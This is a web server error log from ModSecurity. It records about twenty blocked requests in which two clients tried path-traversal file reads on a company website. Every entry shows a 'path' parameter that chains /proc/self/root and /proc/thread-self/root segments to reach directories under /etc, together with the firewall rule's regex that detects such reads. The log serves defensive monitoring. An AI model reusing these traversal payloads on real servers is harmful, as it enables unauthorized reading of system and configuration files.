[Fri Mar 20 04:30:30.793547 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:59936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3luoXxyEfFpUF8f9a5wAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:32.123854 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.241.31:59948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3mAF0L0L-SsrnPo4_6wAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:33.391994 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:59962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3mfqxLDW4GITHUkS59QAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:34.623538 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.241.31:59970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3ml1pVZ5mVmJwsFMIqwAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:37.019953 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:59982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3nfqxLDW4GITHUkS5-AAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:38.321953 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.241.31:55296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3nvqxLDW4GITHUkS5-gAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:41.787405 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.241.31:55302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3oV1pVZ5mVmJwsFMIswAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:43.196011 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:51340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3owF0L0L-SsrnPo4_-AAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:30:44.262575 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.241.31:55310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3pPHIg5MgXLBnicPTFwAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:45.511198 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.243.128:55430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3pfHIg5MgXLBnicPTGgAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:30:45.551270 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.241.31:55320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3pQF0L0L-SsrnPo4_-gAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:46.857224 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:55336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3pvXLqtnMIWvjpaJw0gAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:49.240284 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:55444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3p11pVZ5mVmJwsFMItwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:30:52.725880 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.241.31:43636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3rPHIg5MgXLBnicPTHwAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:54.038411 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.241.31:43644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3rgF0L0L-SsrnPo5AAAAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:30:56.340751 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:43658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3r_qxLDW4GITHUkS6CgAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:31:11.564825 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:33696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3vzJ3M9BSuKP7CAbouQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:32:30.438888 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.243.128:52142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4DvqxLDW4GITHUkS6eAAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:32:38.519310 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:50616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4FfqxLDW4GITHUkS6hQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:32:44.280797 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:58914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4HPHIg5MgXLBnicPTWQAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:32:59.725648 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:58918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4KxCii7xarUs8iHY9zQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
